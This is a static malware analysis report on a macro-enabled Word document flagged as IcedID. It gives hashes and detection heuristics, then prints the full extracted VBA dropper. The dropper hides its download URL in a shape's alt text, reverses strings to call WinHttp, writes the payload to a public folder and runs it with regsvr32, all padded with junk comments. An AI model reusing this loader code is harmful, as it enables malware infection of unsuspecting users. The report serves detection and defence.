Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e0ba68b40597e389…

MALICIOUS

Office (OOXML)

102.0 KB Created: 2020-10-20 08:08:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-25
MD5: 38617ff33849f71b7bb7292da850dfbe SHA-1: aa4dc12a4529e6fd3b06116dbafa39fafc9ca98a SHA-256: e0ba68b40597e3891f009ae8fc3f10d17232c927a1ab740452c2cae7ac10c53e
290 Risk Score

Heuristics 7

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    eLjVO(icmaa + "." + "shell").exec (uESuS)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set xLkIg = VBA.CreateObject(zJGLt + "" + wBhYN)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 14953 bytes
SHA-256: 74ca2eed97d5f4890c39bcbf24fe7db77f9c13376e0e0b399356f3a4526a10fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YHHup"
Sub nJglC(xlueB, Optional ByVal veFbr As String = "c:\users\public\wHETA.txt", Optional ByVal wBhYN As String = "systemobject")
' Euphonious legible muck
' Plug contraceptive
' Byway multicolour unbidden cylindrically
' Laconically oversees unquenchable myopia deduction healths
' Technically encases urges hideously
' Hemisphere disingenuously presumptuously electrolytic teenyweeny bills
' Exuberant sipping
' Cubists seam
' Manias peremptory confusing reply
' Mangroves implode smelling nationality coincidentally explorable
' Illegitimate
' Preserver supernova
' Walked
' Swarm indigestion constraint
' Recondite brambles necromancers
' Irishmen regroup
' Privatisations
' Telephonist scalar
' Resides mistiness
' Picturing apartment molests
' Cushion centrally
' Glinting masterclass
' Limitless daunts
' Arriver names poodles retracted bate
' Divinity caking controllers nastiest belay
' Rollerskating disparate bucketing
' Derogate tacked classify larger
' Integrand bourbons airfield beetle
' Transitoriness
' Talon inferiority ingestion acyclic
' Costliest mutterers arrowing drafters mutual
' Artefactual proud deliberations rectilinear disallow
Set xLkIg = VBA.CreateObject(zJGLt + "" + wBhYN)
' Sprightlier lodgement guppy flatly strongholds
' Steaming demoralising unjustifiable harangued
' Syria deluxe upholsterers
' Cackle passwords raillery
' Unimaginable importation muddied deceptively
' Stolid biometric
Set mlTeb = xLkIg.CreateTextFile(veFbr)
' Creationism reconsulting carvings politeness
' Majolica grafted snapping ridiculously howlings altruist
' Wraith sinter
' Understudy illegality
' Sloped uselessly personality
' Repair despots
' Estuary refreshing reducer disconsolation
mlTeb.WriteLine xlueB
' Unpopularity bottled range
' Stipendiary
' Flexibilities dipsomaniacs exhilaration balmy substratum
' Purines gated grasshoppers interpellation
' Omens
' Applicator bowels macaque defamed
mlTeb.Close
' Containable classically mountings woodenness
' Ethnographic uninformatively
' Idiocy
' Raiding shown clammed
' Paltry partisans crusty
' Congratulatory tracker rectum ambles
' Attackers strives argon virginia puffballs
' Caterwauls feign
' Uncivil primarily
' Realism selfemployed fluency
' Retrievers durban chairs
' Cool bits shyest chessboard
' Trickled
' Flexion pedagogical ignition reggae puny demagnetisation
' Sacks tentative instabilities
' Segment mimicking stunted
' Grimmest airbus
' Moderating reproved delves
' Evacuated parleying mathematical pronunciations
' Bronchi blandly truces
' Soundcheck geniality breakfast beamy
' Unchanged appropriations waded misunderstanding revivalists
' Detach fissions remembers
' Attenuate humbler outer sienna
' Fringing dodecahedra teehee
' Beaked cloths
' Absolved automorphisms anorak therapeutically fumingly
' Gopher
' Spirits taints islanders journeyer postulate
' Carer desolated yellowed ditches joyous vigilante
' Vanish sheen imaged refunded
' Plateaus missionary dependencies
' Savoury observation
' Dangled interstices shortish
' Jambs brooch spillage hierarchies
' Stooges calves
' Misspend
' Pleats
' Negative prevaricated stall newsroom asteroid congestive
' Duvet chit velveteens fungous
End Sub
' Slamming employ decrements
' Melange regulator devising unarmed pluto
' Churchwarden vinyl deploring lampshades vindication lapland untyped
' Outpointing
' Reunions forbade
Sub AutoOpen()
' African freshly
' Explanatory nationality pleurisy
' Immoderately toggles adjournment level
' Swerves millionth
' Laboured maps strenuous pillow dejectedly
' Meteorologist elaboration compactions bader
' Biomedical insulate
' Sacking blockbusting personifies moonlighting rotatory bugger tremors glaciology
' Rom bracelets matriculating
' Virtually embarrasses hansard
' Tedious blackguard chrysanthemums buffet
' Vitals reintroducing impelled prosecutes
' Unzipping vastly purred
' Ministers equestrian
' Panthers
' Marsupial scrubbers recounted misdirect
' Inoperable transplant charmingly
' Theocracy fretwork
' Compete
' Guiders anaerobic races
' Barterer scolds copouts
' Paralytically reabsorption
' Dramatisations prolong
' Hinterland jar muff
' Inheritor prerogatives unexpurgated
' Slimness missal
' Marigold contraption evicted blacked
' Violinists plausible
' Dormouse unbeknown
Dim ZIOcb As New NAWgT
' Roughen faulty amalgamates cypher
' Equanimity militarily
' Comedies academically
' Chaperoned bookings decimalise livening infelicitously
' Deepfreezing
cApUh = ""
 
' Cartridges universes
' Symmetrical valets
' Washes titanically delved
' Maximises
' Caricatured comments codebreaker calculator censure
' Remanded distant jeered eve nudist
' Parades
' Condemnable mutes
' Ornamented apprehensive omelette
' Indexes goalkeeping
' Maddest quagga
' Prober vocalising exorcise toluene
' Swapper shrank synapses variant
' Frequent pronto backpacking cuffing enfranchising
xlueB = ZIOcb.DuIiL(SgtiJ)
' Texas contentious
' Valour
' Hamburgers thaws authoritatively irregularities
' Overproduction
' Apprehend expelling incommunicado
' Holdups repressing intricacy toucans wry
nJglC inJfa(xlueB)
' Subscriber eukaryotes helplines
' Upthrust obstructed pillared dampened baggages nave workpeople transmogrify
' Eukaryotes
' Obfuscate myopic sprinter hickory
' Arcane submerged hubris
' Serum holocaust aside purposive
' Doughs houseflies
' Dextral
' Gatecrashers milkmen glassful expresses
' Invariant wrasse
' Aquatics bodices
' Bulldozed alienates
XFSZq jPiYJ(0) + "vr32 c:\users\public\wHETA.txt", "wscript"
End Sub
Function jrHEz(sZefl, lvVvh)
' Cordite sheered
' Disaffiliate
' Marxists tendered convexity crossbred rubbery smoker
' Peacocks downsized
' Antipodes approvals serials thing
' Marshgas events
' Perturbing alt corners pupils
jrHEz = Split(sZefl, lvVvh)
End Function

Attribute VB_Name = "HKGlw"
' Energised bales satirised underfoot chrysanthemum intimidates
' Sheikh anaerobic madly falling
' Draughty embarrassingly righteous talkback heaven fundamentally robs looking
' Falsely reformation herbalists
' Afghan substances
Function inJfa(Vhdwh)
' Intersects psychosis gratings dismayed racism
' Constantly desperado
' Appraisingly
' Exercisable redefines
inJfa = StrConv(Vhdwh, vbUnicode)
' Portending stomping reconstitutes undefiled
' Gendered materialises
' Orienting
' Hearkened irradiation castor adamantly evilness
' Unlawfully eyelash allocates suggestions punier
End Function
' Cracked hygiene
' Unpromising chambered applauded vorticity stocked
' Scarecrows
' Translating disappointments prickly surfers icons
' Metaphysical reproducible ravish
' Sleights matters corroboration malaise
Function jSfja()
' Hypertonic klaxons nails cellar
' Romantics legatees morpheme stopover
' Speechifying rhododendrons swarthy money
' Erupts
' Seaward curry commented
' Penetratingly vaccinate lawlessness funerary perinatal
' Decentralisation divergence antidote spoonfuls
' Dissension slowish
' Destroys lashing
' Received wholesaling consternation
' Reflects inborn fouled overpriced devaluations
' Imparting invalided eosin haemoglobin
' Herein tridents
' Superabundant tempests accrual paragraph cartography
With ActiveDocument.shapes(1)
jSfja = .AlternativeText
End With
End Function
' Reimbursing nobleman
' Flouts
' Biplane
' Remedies
' Slows hares unsticking overdetermined
Function jPiYJ(yytCX)
' Rejuvenated invisibility jousting childbirth horseshoes
' Novelty exclaiming styx media detectable scuffles
' Lifespan boathouses westernmost spilt
' Authority amphitheatre
' Towel knew keels smelters gustiest repayments
' Unguided deliverers universals
' Resident constraining revival perceptual devotes darting
' Pickle goitre strops
' Footages reserve stultified hares reassured
' Analogical crumble criticism
' Landform incombustible cloudburst
' Easiness statehood jerking shackles
DGwoP = jrHEz(jSfja(), "~~~")
RwNYW = DGwoP(yytCX)
jPiYJ = RwNYW
End Function

Attribute VB_Name = "NAWgT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Dyrdm(pYesF)
' Peseta wretchedness slavery attitudinal
' Corral monophthongs ventriloquist usurious razing hearties
' Underwater
' Whereof crisis
' Skips dirtying agriculturalists illuminated
' Discourtesy powers
' Swindlers
' Tunisian wilted beaconed affiliating
' Middleweight displeasing inquisition
' Bonus underfunding allied
' Madras aerate
' Manic hibernation grasped glowingly
' Sharks digitisation pricked
' Intuitively socialite hippo slit reimburses
' Harpist
EdSBf = pYesF
QzNAy = Len(EdSBf)
For lqkis = 0 To QzNAy - 1
' Photolysis unyielding scrutinise unrolling
' Torchbearers decried sunspot indignant gratifications touchdown zenith
' Bipeds
' Evangelists borrowing
' Wadings kinship crones
' Garbled
' Batted beadings designating refreshingly masseurs
' Brusque raucously rotatable wholesaler
' Abuser
' Research earlobe poseidon patrilineal
' Religiously bail tackled
' Sachets thrice
' Implantation renovating lorry amity
' Quantifying retailers immemorial
' Denaturing exemptions silkier tempting
' Languish
' Unfailingly despots
' Change billiards candy remonstrated achieving dangle
IDHWO = IDHWO & Mid(EdSBf, (QzNAy - lqkis), 1)
Next lqkis
' Passionately hips unexcited aggressively unsharable deodorants
' Examined dips dried tubercular faculty buzzard
' Anvil newlywed nails lottery flapped morphologically
' Blossom squash
' Extremity
' Trusting
Dyrdm = IDHWO
End Function
' Tresses nuzzle
' Unaided shutdowns satin matriarchal
' Riposted typist glyphs remixed
' Bipedalism paleface knitter credibility defend
' Displacement confirmations
Function DuIiL(TnVvD)
' Boa ghastly
' Swearer encircle desegregation
' Picaresque promiscuity bluebell outrages
' Behemoth biographers confession glaciations
' Perineal subordinates captaining goldsmiths
Dim WCwYc As Object
' Ingot finely remonstrating concession
' Tussocks avail antiseptics
' Furriers
' Reviews peppercorn whispering neutrals broodiness
' Deniable broaches intently sorrowful
' Interpret clocking coronal knights tiring aggravations
' Viewing clinging nasalised unsuitably
' Patter thrombus louche utilitarians
' Poetically mending landslide
' Icepicks pottage spread enteritis
' Reiterates unworried ousts clumped drugged miniaturised
' Habitats payslips mindlessly unladylike
Set WCwYc = CreateObject(Dyrdm(TnVvD) + "." + Dyrdm(TnVvD) + "Request.5.1")
' Desiccation pawpaws inserting chimp napalm martens
' Dauber adulterous epileptics drink
' Booby freshened pentathlon teammate
' Flecks seronegative
' Weltering creator
' Speculator powers
' Housing rumple
' Magnetisation motherstobe
' Holler superstitiously ironmongery liaised sinusoidally
' Assimilate hearings from taproom negated assassin
' Chancing savoured divisions
' Westbound wetsuit linseed guillemots legwork
' Fatless crete vangogh collectively underloaded
' Disgraced
' Radiographers kinshasa
' Owing reviling
' Fearlessly impressiveness
' Frightened chanted
dGoeb = jPiYJ(1)
' Glasnost nogging
' Syrian
' Amendments
' Hey conger sued
' Controllers spiralling stentor chimed
' Adorn
WCwYc.Open "GET", Dyrdm(dGoeb), False
' Rehash butterfat ho curtained heartlands
' Refined separatists audience killer escorting
' Dismayed closable decorations
' Unfelt
' Furious bumpkins graffito flashier perspicacious unwise rejections
WCwYc.Send
' Parental glutton vied reclassify halfhour
' Blowfly cubist contraception incognito errs
' Rhapsodies confounds comradeship lagoon rampaging imbecile bouncing mouthtomouth
' Consultant abductor earned
' Heartbreaks insurances heroism
' Geishas singlemindedly
' Electrolysing swishy
' Chucking masks
DuIiL = WCwYc.responsebody
End Function

Attribute VB_Name = "iIzet"
Public Const SgtiJ As String = "ptthniw"
Public Const zJGLt As String = "scripting.file"
Function eLjVO(wGSgF)
Set eLjVO = CreateObject(wGSgF)
End Function
Sub XFSZq(uESuS, icmaa)
' Browbeaten stereos drubbed
' Importer pursed deluge evident showpieces dribbler
' Humming battered
' Propagate shoes
' Weighty exacerbation
' Pimple enjoyable storeroom
' Heuristically wright debauchery dimpled drafter irretrievably
' Trunk goaded reconciled
' Digester dissect cowgirl
' Antenatal purines
' Grovels uninjured grittier sandpipers dogmatically
' Unselfconscious misheard cozier
' Plural
' Tauter painkillers
' Yttrium
' Lords heckling
' Gently dimorphism
' Weakish seizures displeasure tubas
' Transitoriness
' Hyperventilation thrashing throroughly soaked binnacle ungracious
' Diluted compensate
' Disambiguation cobwebs
' Ambushed
eLjVO(icmaa + "." + "shell").exec (uESuS)
' Palatable eczema buyout agnostics
' Inexpressible grimy
' Dime largely schist
' Mongrels
' Muddy synthesised
' Raincoats coincidentally affected teapots
' Vagabonds tirades vogue financial
' Oversampled degaussed inalienable pontificated
' Uncovers unrecognised grumps particularism imperfections clumber
' Rabat
' Jacuzzi miserly
' Toughness intercessions solid
' Speedcop
' Orthodoxies monalisa supercritical overcook panorama dreamily
' Repulsive
' React honeyed resignation lawabiding both
' Epoch
' Chiropodist
' Indefeasible parchment lavender sages saddest
' Quakers catalysing
' Kinetics riddle ledgers tweets simplifies
' Interference floodlights
' Quince egoist trampled unsighted paella
' Despaired malts hunt ruefully
' Amuses firefighters outlets
' Flimsily legislatures placate
' Diffusers
' Springclean obstructions desert
' Shortbread bettering
' Paintbox mule clipping
' Wool
' Cardboard slicing estonia goggled triumphs
' Proficient transferable majorettes wafted preliminary
' Slumber ante
' Reinitialisation octagon cooperating strangler collaborating
' Mumbled wishfully incensed honeydew neutrals wallowing
' Disowning bulletins rancorous boisterously annals
' Exhibit luminary agitate
' Schedule stepwise
' Stalemated illusion reappraised gashing blacklists
' Headwaters effaced disparities divide
' Adapts
' Convulsive paternity
' Ibsen
' Fin modestly pony flocking hormonal
' Maladministration
' Moor ingots sternum recreations
' Fines patchy
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52224 bytes
SHA-256: 8f22877f9bd2cd7dc5e8d639bbdecd2a470473ecb555150c4ae14b5fcaf38484
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely